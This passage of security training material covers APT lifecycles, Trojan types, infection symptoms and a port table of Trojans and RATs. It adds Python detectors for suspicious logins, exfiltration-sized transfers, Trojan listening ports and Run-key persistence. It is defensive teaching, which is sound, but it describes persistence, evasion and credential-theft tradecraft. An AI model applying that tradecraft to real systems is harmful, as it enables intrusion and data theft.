APTs have various characteristics based on which attackers can design and plan their activities to successfully launch an attack. According to security researchers Dr. Max Kilger, Sean Bodmer, Jade Jones, and Gregory Carpenter, some key characteristics of APTs are as follows:

▪ Objectives
The main objective of any APT attack is to repeatedly obtain sensitive information by gaining access to the organization's network for illegal earnings. Another objective of an APT may be spying for political or strategic goals.
▪ Timeliness
It refers to the time taken by an attacker from assessing the target system for vulnerabilities to exploiting them to gain and maintain access to the target system.
▪ Resources
It is defined as the amount of knowledge, tools, and techniques required to perform an attack. APT attacks are more sophisticated attacks performed by highly skilled cyber criminals, and they require considerable resources.
▪ Risk Tolerance
It is defined as the level up to which the attack remains undetected in the target network. APT attacks are well planned and executed with proper knowledge of the target network, which helps them remain undetected in the network for a long time.
▪ Skills and Methods
These are the methods and tools used by attackers to perform a certain attack. The methods used for performing the attack include various social engineering techniques to gather information about the target, techniques to prevent detection by security mechanisms, and techniques to maintain access for a long time.
▪ Actions
APT attacks follow a certain number of technical "actions" that make them different from other types of cyber-attacks. The main objective of such attacks is to maintain their presence in the victim's network for a long time and extract as much data as possible.
▪ Attack Origination Points
They refer to the numerous attempts made to gain entry into the target network. Such points of entry can be used to gain access to the network and launch further attacks. To succeed in gaining initial access, the attacker needs to conduct exhaustive research to identify the vulnerabilities and gatekeeper functions in the target network.
▪ Numbers Involved in the Attack
It is defined as the number of host systems involved in the attack. APT attacks are usually performed by a crime group or crime organization.
▪ Knowledge Source
It is defined as the gathering of information through online sources about specific threats, which can be further exploited to perform certain attacks.

▪ Multi-phased
One of the important characteristics of APTs is that they follow multiple phases to execute an attack. The phases followed by an APT attack are reconnaissance, access, discovery, capture, and data exfiltration.
▪ Tailored to the Vulnerabilities
The malicious code used to execute APT attacks is designed and written such that it targets the specific vulnerabilities present in the victim's network.
▪ Multiple Points of Entry
Once an adversary enters the target network, he/she establishes a connection with the server to download malicious code for further attacks. In the initial phase of an APT attack, the adversary creates multiple points of entry through the server to maintain access to the target network. If one point of entry is discovered and patched by the security analyst, then the adversary can use a different entry point.
▪ Evading Signature-Based Detection Systems
APT attacks are closely related to zero-day exploits, which contain malware that has never been previously discovered or deployed. Thus, APT attacks can bypass security mechanisms that rely on known signatures, such as firewalls, antivirus software, IDS/IPS, and email spam filters.
▪ Specific Warning Signs
APT attacks are difficult to detect. However, some indications of an attack include inexplicable user account activities, the presence of a backdoor Trojan for maintaining access to the network, unusual file transfers and file uploads, unusual database activities, etc.
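The warning signs listed above only become actionable when they are checked against logs. The following Python script is an added example written for this page, not code from the book or from any product: it runs a few simple rules over a constructed authentication and transfer log (the log format, user names, hosts, business hours and size threshold are assumptions made for the example) and flags off-hours logins, logins from a host a user has never used before, newly created accounts, and unusually large outbound transfers.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample log, not captured from a real system.
# Assumed format: <ISO timestamp> <event> <user> <host> <bytes>
SAMPLE_LOG = """\
2020-03-02T09:12:04 login alice ws-alice 0
2020-03-02T09:30:10 login bob ws-bob 0
2020-03-02T11:02:55 transfer alice fileserver 20480
2020-03-02T17:45:00 login alice ws-alice 0
2020-03-03T02:17:31 login alice ws-bob 0
2020-03-03T02:20:09 account_create svc_backup ws-bob 0
2020-03-03T02:21:44 login svc_backup ws-bob 0
2020-03-03T02:40:12 transfer svc_backup ext-host 734003200
2020-03-03T08:55:21 login bob ws-bob 0
"""

BUSINESS_HOURS = range(7, 20)             # 07:00-19:59 local time (assumed)
LARGE_TRANSFER_BYTES = 100 * 1024 * 1024  # 100 MiB (assumed threshold)


def parse_line(line: str):
    """Split one log line into a dict; returns None for blank or malformed lines."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, event, user, host, nbytes = parts
    try:
        return {"ts": datetime.fromisoformat(ts), "event": event,
                "user": user, "host": host, "bytes": int(nbytes)}
    except ValueError:
        return None


def detect_warning_signs(log_text: str) -> list:
    """Return (line_no, rule, user) alerts for the APT warning signs in the log."""
    alerts = []
    hosts_seen = defaultdict(set)  # user -> hosts that user has logged in from so far
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is None:
            continue
        user, host, event = rec["user"], rec["host"], rec["event"]
        if event == "login":
            if rec["ts"].hour not in BUSINESS_HOURS:
                alerts.append((line_no, "off_hours_login", user))
            # A new host is only suspicious once the user has a baseline of known hosts.
            if hosts_seen[user] and host not in hosts_seen[user]:
                alerts.append((line_no, "login_from_new_host", user))
            hosts_seen[user].add(host)
        elif event == "account_create":
            alerts.append((line_no, "account_created", user))
        elif event == "transfer" and rec["bytes"] >= LARGE_TRANSFER_BYTES:
            alerts.append((line_no, "large_transfer", user))
    return alerts


if __name__ == "__main__":
    for line_no, rule, user in detect_warning_signs(SAMPLE_LOG):
        print(f"line {line_no}: {rule} ({user})")
```

Each rule on its own produces false positives (an administrator working late, a real backup account); what makes the constructed log look like the expansion and exfiltration phases is the sequence: a known user appears from another user's workstation at night, a new account is created minutes later from the same host, and that account then moves a large volume of data to an external host. Correlating alerts by user and host is the step that turns these signs into an investigation.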

Advanced Persistent Threat Lifecycle
In the current threat landscape, organizations need to pay greater attention to APTs. APTs may target an organization's IT assets, financial assets, intellectual property, and reputation. Commonly used security and defensive controls will not suffice to prevent such attacks. Attackers behind such attacks adapt their TTPs based on the vulnerabilities and security posture of the target organization. Thus, they can evade the security controls of the target organization. To launch an APT attack, attackers follow a certain set of phases to target, penetrate, and exploit an organization's network. Attackers must follow each phase step by step to successfully compromise and gain access to the target system.
The various phases of the APT lifecycle are as follows:

1. Preparation
The first phase of the APT lifecycle is preparation, where an adversary defines the target, performs extensive research on the target, organizes a team, builds or attains tools, and performs tests for detection. APT attacks usually require a high level of preparation, as the adversary cannot risk detection by the target's network security. Additional resources and data may be necessary before carrying out the attack. An attacker needs to perform highly complex operations before executing the attack plan against the target organization.
2. Initial Intrusion
The next phase involves attempting to enter the target network. Common techniques used for an initial intrusion are sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Spear-phishing emails usually appear legitimate, but they contain malicious links or attachments containing executable

malware. These malicious links can redirect the target to the website where the target's web browser and software are compromised by the attacker using various exploit techniques. Sometimes, an attacker may also use social engineering techniques to gather information from the target. After obtaining information from the target, attackers use such information to launch further attacks on the target network. In this phase, malicious code or malware is deployed into the target system to initiate an outbound connection.
3. Expansion
The primary objectives of this phase are expanding access to the target network and obtaining credentials. If the attacker's aim is to exploit and gain access to a single system, then there is no need for expansion. However, in most cases, the objective of an attacker is to access multiple systems using a single compromised system. In this scenario, the first step performed by an attacker after an initial compromise is to expand access to the target systems. The main objective of the attacker in this phase is to obtain administrative login credentials to escalate privileges and to gain further access to the systems in the network. For this purpose, the attacker tries to obtain administrative privileges for the initial target system from cached credentials and uses these credentials to gain and maintain access to other systems in the network. When attackers are unable to obtain valid credentials, they use other techniques such as social engineering, exploiting vulnerabilities, and distributing infected USB devices. After the attacker obtains the target's account credentials, it is difficult to track his/her movement in the network, as he/she uses a legitimate username and password.

This expansion phase supports other phases of the APT lifecycle. In the search and exfiltration phase, the attacker can obtain the target data by gaining access to the systems. Attackers identify systems that can be used for installing persistence mechanisms and identify appropriate systems in the network that can be leveraged to exfiltrate data.
4. Persistence
This phase involves maintaining access to the target system, starting from evading security devices such as IDS and firewalls, entering into the network, and establishing access to the system, until there is no further use of the data and assets. To maintain access to the target system, attackers follow certain techniques or procedures, which include the use of customized malware and repackaging tools. These tools are designed such that they cannot be detected by the antivirus software or security tools of the target. To maintain persistence, attackers use customized malware that includes services, executables, and drivers installed on various systems in the target network. Another way to maintain persistence is finding locations for installing the malware that are not frequently examined. These locations include routers, servers, firewalls, printers, etc.

5. Search and Exfiltration
In this phase, an attacker achieves the ultimate goal of network exploitation, which is generally to gain access to a resource that can be used for performing further attacks or using that resource for financial gain. In general, attackers target specific data or documents before launching an attack. However, in some cases, although attackers determine that crucial data are available in the target network, they are unaware of the location of the data. A common method for search and exfiltration is to steal all the data, including important documents, emails, shared drives, and other types of data present on the target network. Data can also be gathered using automated tools such as network sniffers. Attackers use encryption techniques to evade data loss prevention (DLP) technologies in the target network.
6. Cleanup
This is the last phase, where an attacker performs certain actions to prevent detection and remove evidence of compromise. Techniques used by the attacker to cover his/her tracks include evading detection, eliminating evidence of intrusion, and hiding the target of the attack and attacker details. In some cases, these techniques also include manipulating the data in the target environment to mislead security analysts.
It is imperative for attackers to make the system appear as it was before they gained access to it and compromised the network. Therefore, it is essential for an attacker to cover his/her tracks and remain undetected by security analysts. Attackers can change any file attributes back to their original state. Information listed, such as file size and date, is just attribute information contained in the file.
Figure 7.1: Advanced Persistent Threat Lifecycle (Preparation, Initial Intrusion, Expansion, Persistence, Search and Exfiltration, Cleanup)

Trojan Concepts
In this section, we will discuss the basic concepts of Trojans to understand various Trojans and backdoors as well as their impact on network and system resources. This section describes various Trojans and highlights their purpose, symptoms, and common ports used. It also discusses the methods adopted by attackers to install Trojans to infect target systems and perform malicious activities.
This section also describes various types of Trojans. Every day, attackers discover or create new Trojans designed to discover vulnerabilities of target systems. Trojans are categorized by the way they enter systems and the types of actions they perform on these systems.

What is a Trojan?
According to ancient Greek mythology, the Greeks won the Trojan War with the aid of a giant wooden horse that was built to hide their soldiers. The Greeks left this horse in front of the gates of Troy. The Trojans thought that the horse was a gift from the Greeks, which they had left before apparently withdrawing from the war, and brought it into their city. At night, the Greek soldiers broke out of the wooden horse and opened the city gates to let in the rest of the Greek army, who eventually destroyed the city of Troy.
Inspired by this story, a computer Trojan is a program in which malicious or harmful code is contained inside an apparently harmless program or data, which can later gain control and cause damage, such as ruining the file allocation table on your hard disk. Attackers use computer Trojans to trick the victim into performing a predefined action. Trojans are activated upon users' specific predefined actions such as unintentionally installing a malicious software, clicking on a malicious link, etc., and upon activation, they can grant attackers unrestricted access to all the data stored on the compromised information system and cause potentially severe damage. For example, users could download a file that appears to be a movie, but, when executed, unleashes a dangerous program that erases the hard drive or sends credit card numbers and passwords to the attacker.
A Trojan is wrapped within or attached to a legitimate program, meaning that the program may have functionality that is not apparent to the user. Furthermore, attackers use victims as unwitting intermediaries to attack others. They can use a victim's computer to commit illegal DoS attacks.

Trojans work at the same level of privileges as the victims. For example, if a victim has privileges to delete files, transmit information, modify existing files, and install other programs (such as programs that provide unauthorized network access and execute privilege elevation attacks), once the Trojan infects that system, it will possess the same privileges. Furthermore, it can attempt to exploit vulnerabilities to increase the level of access even beyond the user running it. If successful, the Trojan can use such increased privileges to install other malicious code on the victim's machine.
A compromised system can affect other systems on the network. Systems that transmit authentication credentials such as passwords over shared networks in cleartext or a trivially encrypted form are particularly vulnerable. If an intruder compromises a system on such a network, he or she may be able to record usernames and passwords or other sensitive information.
Additionally, a Trojan, depending on the actions it performs, may falsely implicate a remote system as the source of an attack by spoofing, thereby causing the remote system to incur a liability. Trojans enter the system by means such as email attachments, downloads, and instant messages.

Indications of Trojan Attack
The following computer malfunctions are indications of a Trojan attack:
▪ The DVD-ROM drawer opens and closes automatically.
▪ The computer screen blinks, flips upside-down, or is inverted so that everything is displayed backward.
▪ The default background or wallpaper settings change automatically. This can be performed using pictures either on the user's computer or in the attacker's program.
▪ Printers automatically start printing documents.
▪ Web pages suddenly open without input from the user.
▪ The color settings of the operating system (OS) change automatically.
▪ Screensavers convert to a personal scrolling message.
▪ The sound volume suddenly fluctuates.
▪ Antivirus programs are automatically disabled, and the data are corrupted, altered, or deleted from the system.
▪ The date and time of the computer change.
▪ The mouse cursor moves by itself.
▪ The left- and right-click functions of the mouse are interchanged.
▪ The mouse pointer disappears completely.
▪ The mouse pointer automatically clicks on icons and is uncontrollable.
▪ The Windows Start button disappears.
▪ Pop-ups with bizarre messages suddenly appear.
▪ Clipboard images and text appear to be manipulated.

▪ The keyboard and mouse freeze.
▪ Contacts receive emails from a user's email address that the user did not send.
▪ Strange warnings or question boxes appear. Often, these are personal messages directed at the user, asking questions that require him/her to answer by clicking a Yes, No, or OK button.
▪ The system turns off and restarts in unusual ways.
▪ The taskbar disappears automatically.
▪ The Task Manager is disabled. The attacker or Trojan may disable the Task Manager function so that the victim cannot view the task list or end the task on a given program or process.
Figure 7.2: Diagram showing how the attacker extracts information from the victim's system

How Hackers Use Trojans
Attackers create malicious programs such as Trojans for the following purposes:
▪ Delete or replace the OS's critical files
▪ Generate fake traffic to perform DoS attacks
▪ Record screenshots, audio, and video of the victim's PC
▪ Use the victim's PC for spamming and blasting email messages
▪ Download spyware, adware, and malicious files
▪ Disable firewalls and antivirus
▪ Create backdoors to gain remote access
▪ Infect the victim's PC as a proxy server for relaying attacks
▪ Use the victim's PC as a botnet to perform DDoS attacks
▪ Steal sensitive information such as:
o Credit card information, which is useful for domain registration as well as for shopping using keyloggers
o Account data such as email passwords, dial-up passwords, and web service passwords
o Important company projects, including presentations and work-related papers
▪ Encrypt the victim's machine and prevent the victim from accessing the machine
▪ Use the target system as follows:

o To store archives of illegal materials, such as child pornography. The target continues using his/her system without realizing that attackers are using it for illegal activities
o As an FTP server for pirated software
▪ Script kiddies may just want to have fun with the target system; an attacker could plant a Trojan in the system just to make the system act strangely (e.g., the CD/DVD tray opens and closes frequently, the mouse functions improperly, etc.)
▪ The attacker might use a compromised system for other illegal purposes such that the target would be held responsible if these illegal activities are discovered by the authorities

Common Ports used by Trojans
Ports represent the entry and exit points of data traffic. There are two types of ports: hardware ports and software ports. Ports within the OS are software ports, and they are usually entry and exit points for application traffic (e.g., port 25 is associated with SMTP for e-mail routing between mail servers). Many existing ports are application-specific or process-specific. Various Trojans use some of these ports to infect target systems.
Users need a basic understanding of the state of an "active connection" and the ports commonly used by Trojans to determine whether a system has been compromised.
Among the various states, the "listening" state is the important one in this context. The system generates this state when it listens for a port number while waiting to connect to another system. Whenever a system reboots, Trojans move to the listening state; some use more than one port: one for listening and the other(s) for data transfer. Common ports used by different Trojans are listed in the table below.

Port | Trojan
2 | Death
20/22/80/443 | Emotet
21 | Blade Runner, Doly Trojan, Invisible FTP, WebEx, Fore, WinCrash
21/3024/4092/5742 | WinCrash
22 | Shaft, Linux Rabbit, SSH RAT
23 | Tiny Telnet Server, EliteWrap
25 | Antigen, Email Password Sender, Terminator, WinPC, WinSpy, Haebu Coceda, Shtrilitz Stealth, killerRat, Houdini RAT, Kuang2 0.17A-0.30, Jesrto, Lazarus Group, Mis-Type, Night Dragon
26 | BadPatch
31/456 | Hackers Paradise
53 | Denis, Ebury, FIN7, Lazarus Group, Threat Group-3390, RedLeaves, Tropic Trooper
80 | Executer, Codered, APT18, APT19, APT32, BBSRAT, Calisto, Carbanak, Carbon, Comnie, Empire, FIN7, InvisiMole, Lazarus Group, MirageFox, Mis-Type, Misdat, Mivast, MoonWind, NetMonitor, Night Dragon, POWERSTATS, RedLeaves, S-Type, Threat Group-3390, UBoatRAT
443 | APT3, APT29, APT33, ADVSTORESHELL, AuditCred, BADCALL, BBSRAT, Bisonal, Biba, Carbanak, Cardinal RAT, Comnie, Derusbi, ELMER, Empire, FELIXROOT, FIN7, FIN8, ghOst RAT, HARDRAIN, Hi-Zor, HOPLIGHT, KEYMARBLE, LOWBALL, Lazarus Group, Misdat, Mis-Type, MoonWind, Naid, Nidiran, Pasam, PlugX, PowerDuke, POWERTON, Proxysvc, RATANKBA, RedLeaves, S-Type, TEMP.Veles, Threat Group-3390, TrickBot, Tropic Trooper, TYPEFRAME, UBoatRAT
445 | WannaCry, Petya, Dragonfly 2.0
555 | Ini-Killer, Phase Zero, Stealth Spy
666 | Satanz Backdoor, Ripper
1001 | Silencer, WebEx
1011 | Doly Trojan
1026/64666 | RSM
1095-98 | RAT
1170 | Psyber Stream Server, Voice
1177 | njRAT
1234 | Ultors Trojan
1234/12345 | Valvo line
1243 | SubSeven 1.0-1.8
1243/6711/6776/27374 | SubSeven
1245 | VooDoo Doll
1337 | Agent.BTZ/ComRat, JavaRAT, Adwind
1349 | Back Office DLL
1433 | Misdat
1492 | FTP99CMP
1600 | Shivka-Burka
1608 | HeliSpy
1807 | SpySender
1863 | XtremeRAT
1981 | Shockrave
1999 | BackDoor 1.00-1.03
2001 | Trojan Cow
2115 | Bugs
2140 | The Invasor
2140/3150 | Deepthroat
2155 | Illusion Mailer, Nirvana
2801 | Phineas Phucker
3129 | Masters Paradise
3131 | Subsari
3150 | The Invasor
3389 | RDP
3700/9872-9875/10067/10167 | Portal of Doom
4000 | RA
4567 | File Nail
4590 | ICQ Trojan
5000 | Bubbel, SpyGate RAT, Punisher RAT
5001/5050 | Sockets de Troie
5321 | Firehotcker
5400-02 | Blade Runner, Robo-Hack
6667/12349 | Bionet, Magic Hound
6670-71 | Deepthroat
8443 | Nidiran, FELIXROOT, TYPEFRAME
8787/54321 | BackOrifice 2000
9989 | iNi-Killer
10048 | Delf
10607 | Coma 1.0.9
11000 | Senna Spy
11223 | Progenic Trojan
12223 | Hack'99 KeyLogger
12345-46 | GabanBus, NetBus
12361/12362 | Whack-a-mole
16969 | Priority
20001 | Millennium
20034/1120 | NetBus 2.0 Pro, NetBus 2.01 Beta
21544 | GirlFriend 1.0, Beta-1.35
22222 | Rux, DarkComet RAT, Pandora RAT
22222/33333 | Prosiak
23432 | Asylum
23456 | Evil FTP, Ugly FTP
25685 | Moon Pie
26274 | Delta
30100-02 | NetSphere 1.27a
31337-38 | Back Orifice / BO 1.20 / Deep BO
31338 | Deep BO
31339 | NetSpy DK
31666 | BOWhack
34324 | BigGluck, TN
40412 | The Spy
40421-26 | Masters Paradise
47262 | Delta
50766 | Fore
Table 7.2: Trojans and corresponding ports of attack
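The table above is only useful if it is checked against what a host is actually listening on. The following Python script is an added example written for this page, not code from the book: it parses netstat -an style output (the sample lines below are constructed, not captured from a real host), flags listening sockets whose ports appear in a subset of the Trojan table above or in the file-sharing ports from the File Sharing countermeasure earlier in this module (21, 139, 445), and records whether each listener is bound to all interfaces or only to loopback. A port match alone is weak evidence, since legitimate software reuses these numbers (5000 and 12345 are common development-server ports); each finding should be confirmed by identifying the owning process (netstat -ano on Windows, ss -ltnp on Linux).

```python
# Subset of the port table above (port -> Trojans/RATs reported to use it).
TROJAN_PORTS = {
    1177: "njRAT",
    1243: "SubSeven 1.0-1.8",
    1337: "Agent.BTZ/ComRat, JavaRAT, Adwind",
    5000: "Bubbel, SpyGate RAT, Punisher RAT",
    6667: "Bionet, Magic Hound",
    12345: "GabanBus, NetBus",
    12346: "GabanBus, NetBus",
    27374: "SubSeven",
    31337: "Back Orifice",
    31338: "Deep BO",
    54321: "BackOrifice 2000",
}
# Ports from the File Sharing countermeasure earlier in this module.
FILE_SHARING_PORTS = {21: "FTP", 139: "NetBIOS session service", 445: "SMB"}

# Constructed netstat -an style output (Windows column layout); not from a real host.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:5000         0.0.0.0:0              LISTENING
  TCP    192.168.1.20:49812     203.0.113.9:80         ESTABLISHED
  TCP    [::]:445               [::]:0                 LISTENING
"""


def split_host_port(addr: str):
    """'0.0.0.0:445' -> ('0.0.0.0', 445); '[::]:445' -> ('::', 445)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), int(port)


def scope_of(host: str) -> str:
    """Classify the bind address: wildcard binds are reachable from the network."""
    if host in ("0.0.0.0", "::"):
        return "all interfaces"
    if host.startswith("127.") or host == "::1":
        return "loopback only"
    return "specific interface"


def audit_listeners(netstat_text: str) -> list:
    """Return findings for LISTENING sockets on known Trojan or file-sharing ports."""
    findings = []
    for line in netstat_text.splitlines():
        parts = line.split()
        # Only four-column TCP/UDP rows are connection entries; headers are skipped.
        if len(parts) != 4 or parts[0].upper() not in ("TCP", "UDP"):
            continue
        proto, local, _foreign, state = parts
        if state.upper() != "LISTENING":
            continue
        host, port = split_host_port(local)
        if port in FILE_SHARING_PORTS:
            kind, name = "file_sharing", FILE_SHARING_PORTS[port]
        elif port in TROJAN_PORTS:
            kind, name = "trojan_port", TROJAN_PORTS[port]
        else:
            continue
        findings.append({"proto": proto.upper(), "port": port, "kind": kind,
                         "match": name, "scope": scope_of(host)})
    return findings


if __name__ == "__main__":
    for f in audit_listeners(SAMPLE_NETSTAT):
        print(f"{f['proto']}/{f['port']:<6} {f['kind']:<13} {f['scope']:<18} {f['match']}")
```

On the constructed sample the script reports SMB exposed on all interfaces (both IPv4 and IPv6), a wildcard listener on 12345, and a loopback-only listener on 5000; the established outbound connection on port 80 is not reported, because the table describes listening ports, and a reverse-connecting Trojan that dials out over 80 or 443 is only visible through process and destination analysis.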
Types of Trojans
Trojans are classified into many categories depending on the exploit functionality and targets. Some Trojan types are listed below:
1. Remote Access Trojans
2. Backdoor Trojans
3. Botnet Trojans
4. Rootkit Trojans
5. E-Banking Trojans
6. Point-of-Sale Trojans
7. Defacement Trojans
8. Service Protocol Trojans
9. Mobile Trojans
10. IoT Trojans
11. Security Software Disabler Trojans
12. Destructive Trojans
13. DDoS Attack Trojans
14. Command Shell Trojans

Remote Access Trojans
Remote access Trojans (RATs) provide attackers with full control over the victim's system, thereby enabling them to remotely access files, private conversations, accounting data, etc. The RAT acts as a server and listens on a port that is not supposed to be available to Internet attackers. Therefore, if the user is behind a firewall on the network, it is less likely that a remote attacker will connect to the Trojan. Attackers in the same network located behind the firewall can easily access Trojans.
For example, Jason is an attacker who intends to exploit Rebecca's computer to steal her data. Jason infects Rebecca's computer with server.exe and plants a reverse connecting Trojan. The Trojan connects through port 80 to the attacker, who is located in Russia, establishing a reverse connection. Now, Jason has complete control over Rebecca's machine.
Figure 7.3: Working of Remote Access Trojan
Trojan
Attackers use RATs to infect the target machine to gain administrative access. RATs help an attacker to remotely access the complete GUI and control the victim's computer without his or her awareness. Moreover, they can perform screen and camera capture, code execution, keylogging, file access, password sniffing, registry management, and so on. They infect victims via phishing attacks and drive-by downloads, and they propagate through infected USB keys or networked drives. They can download and execute additional malware, execute shell commands, read and write registry keys, capture screenshots, log keystrokes, and spy on webcams.
• njRAT

njRAT is a powerful RAT with data-stealing capabilities. In addition to logging keystrokes, it can access the victim's camera, steal credentials stored in browsers, upload and download files, perform process and file manipulations, and view the victim's desktop. This RAT can be used to control botnets (networks of computers), thereby allowing the attacker to update, uninstall, disconnect, restart, and close the RAT, and rename its campaign ID. The attacker can further create and configure the malware to spread through USB drives with the help of the command-and-control server software.

Features:
o Remotely access the victim's computer
o Collect victim's information such as IP address, hostname, and OS
o Manipulate files and system files
o Open an active remote session providing the attacker access to the command line of the victim's machine
o Log keystrokes and steal credentials from browsers

Figure 7.4: Screenshot of njRAT

Some additional RATs are as follows:
• FlawedAmmyy
• MoSucker
• ProRat
• Theef
• Ismdoor
• KediRAT
• PCRat/Gh0st RAT

Backdoor Trojans

A backdoor is a program that can bypass the standard system authentication or conventional system mechanisms such as IDS and firewalls, without being detected. In these types of breaches, hackers leverage backdoor programs to access the victim's computer or network. The difference between this type of malware and other types of malware is that the installation of the backdoor is performed without the user's knowledge. This allows the attacker to perform any activity on the infected computer, such as transferring, modifying, or corrupting files, installing malicious software, and rebooting the machine, without user detection. Backdoors are used by attackers for uninterrupted access to the target machine. Most backdoors are used for targeted attacks. Backdoor Trojans are often used to group victim computers to form a botnet or zombie network that can be used to perform criminal activities. Backdoor Trojans are often initially used in the second (point of entry) or third (command-and-control [C&C]) stage of the targeted attack process. The main difference between a RAT and a traditional backdoor is that the RAT has a user interface, i.e. the client component, which can be used by the attacker to issue commands to the server component residing in the compromised machine, whereas a backdoor does not.
For example, a hacker who is performing a malicious activity identifies a vulnerability in a target network. The hacker implants the networkmonitor.exe backdoor in the target network. The backdoor will be installed in a victim's machine on the target network without being detected by network security mechanisms. Once installed, networkmonitor.exe will provide the attacker with uninterrupted access to the victim's machine and the target network.
• Poison Ivy

Poison Ivy gives the attacker practically complete control over the infected computer. The Poison Ivy remote administration tool is created and controlled by a Poison Ivy management program or kit. The Poison Ivy kit consists of a graphical user interface, and the backdoors are small (typically, <10 kB). Once the backdoor is executed, it copies itself to either the Windows folder or the Windows\system32 folder. The filename and locations of the backdoor are defined by the creator of the backdoor when using the Poison Ivy kit to create the server program. Some variants of Poison Ivy copy themselves into an alternate data stream. A registry entry of the backdoor will be added to ensure that the backdoor is started every time the computer is booted up. The server then connects to a client using an address defined when the server part was created. The communication between the server and client programs is encrypted and compressed. Poison Ivy can be configured to inject itself into a browser process before making an outgoing connection to bypass firewalls.

Features:
o File modification, deletion, and transfer to and from the infected system
o Windows registry can be viewed and edited
o Currently running processes can be viewed and suspended or killed
o Current network connections can be viewed and shut down
o Services can be viewed and controlled (e.g., stopped or started)
o Installed devices can be viewed and some devices can be disabled
o The list of installed applications can be viewed, entries can be deleted, or programs can be uninstalled
o Accesses Windows command shell on the infected computer
o Steals information by taking screenshots of the desktop and recording audio or webcam footage
o Accesses saved passwords and password hashes
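The persistence behaviour just described (a copy dropped in the Windows folder, sometimes inside an alternate data stream, plus a registry entry that starts it at boot) leaves traces that a defender can audit. The following block is an added example and is not code from the courseware or from any tool it names: it reads a Windows .reg export of the Run keys and flags entries that point into an alternate data stream or execute from the Windows directory, so that an analyst can verify them against a known-good baseline. The export text, vendor paths and entry names are constructed for the example.

```python
"""Added example (not from the courseware): audit Run-key autostart entries in a
Windows .reg export for the persistence traits described above.
The export below is constructed; every path and entry name is invented."""
import re

# Constructed .reg export of both Run keys, in the format "reg export" produces.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VendorTray"="\"C:\\Program Files\\Example Vendor\\tray.exe\" /minimized"
"Updater"="C:\\Windows\\system32\\svchost.exe:winupd.exe"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SyncClient"="C:\\Users\\rebecca\\AppData\\Local\\ExampleSync\\sync.exe /background"
"WinHelper"="C:\\Windows\\winhelper32.exe"
"""

RUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
}
KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')
# A second colon after the drive letter means the target is a named stream (file.exe:stream).
ADS_RE = re.compile(r'^"?[A-Za-z]:\\[^:"]*:[^\\/\s"]+')
# The executable part of a command line, with or without surrounding quotes.
EXE_RE = re.compile(r'^"?([^"]*?\.exe)', re.IGNORECASE)


def unescape(value):
    """Undo .reg string escaping: \\\\ becomes \\ and \\" becomes "."""
    return value.replace("\\\\", "\\").replace('\\"', '"')


def audit_run_keys(reg_text):
    """Return (key, value name, reasons) for every Run entry worth a closer look."""
    findings, current_key = [], None
    for line in reg_text.splitlines():
        key_match = KEY_RE.match(line)
        if key_match:
            current_key = key_match.group(1).lower()
            continue
        value_match = VALUE_RE.match(line)
        if not value_match or current_key not in RUN_KEYS:
            continue
        name, command = value_match.group(1), unescape(value_match.group(2))
        reasons = []
        if ADS_RE.match(command):
            reasons.append("alternate data stream")
        exe = EXE_RE.match(command)
        if exe and exe.group(1).lower().startswith("c:\\windows\\"):
            # Many OS binaries live here too; the point is to force a check
            # against a baseline or the file's publisher signature.
            reasons.append("windows directory")
        if reasons:
            findings.append((current_key, name, reasons))
    return findings


if __name__ == "__main__":
    for key, name, reasons in audit_run_keys(SAMPLE_REG):
        print(f"{name} under {key}: {', '.join(reasons)}")
```

The "windows directory" reason is deliberately noisy: legitimate autostart entries also live there, so the output is a review list, not a verdict. Pairing it with a hash or signature check of the referenced file, and with the other autostart locations (RunOnce, services, scheduled tasks), gives a more complete picture.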

Figure 7.5: Screenshot of Poison Ivy

Some additional backdoor Trojans are as follows:
• Kovter
• POWERSTATS
• ExtraPulsar backdoor
• RogueRobin
• ServHelper
• SpeakUp Linux backdoor
• Winnti

Botnet Trojans

Today, most major information security attacks involve botnets. Attackers (also known as "bot herders") use botnet Trojans to infect a large number of computers throughout a large geographical area to create a network of bots (or a "bot herd") that can achieve control via a command-and-control (C&C) center. They trick regular computer users into downloading Trojan-infected files to their systems through phishing, SEO hacking, URL redirection, etc. Once the user downloads and executes this botnet Trojan in the system, it connects back to the attacker using IRC channels and waits for further instructions. Some botnet Trojans also have worm features and automatically spread to other systems in the network. They help an attacker to launch various attacks and perform nefarious activities such as DoS attacks, spamming, click fraud, and theft of application serial numbers, login IDs, and credit card numbers.

Figure 7.6: Functioning of Botnet
• Necurs

The Necurs botnet is a distributor of many pieces of malware, most notably Dridex and Locky. It delivers some of the worst banking Trojans and ransomware threats in batches of millions of emails at a time, and it keeps reinventing itself. Necurs is distributed by spam e-mails and downloadable content from questionable/illegal sites. It is indirectly responsible for a significant portion of cyber-crime.

Features:
o Destruction of the system
o Turning a PC into a spying tool
o Electronic money theft and Botnet mining
o Serving as a gateway for other viruses

Figure 7.7: Screenshot showing Necurs spam email for tricking victim
Some additional botnet Trojans are as follows:
• Electrum
• Satori
• Torii botnet
• Qakbot
• Hide 'N Seek
• Ramnit
• Panda
• BetaBot
• Cridex
Rootkit Trojans

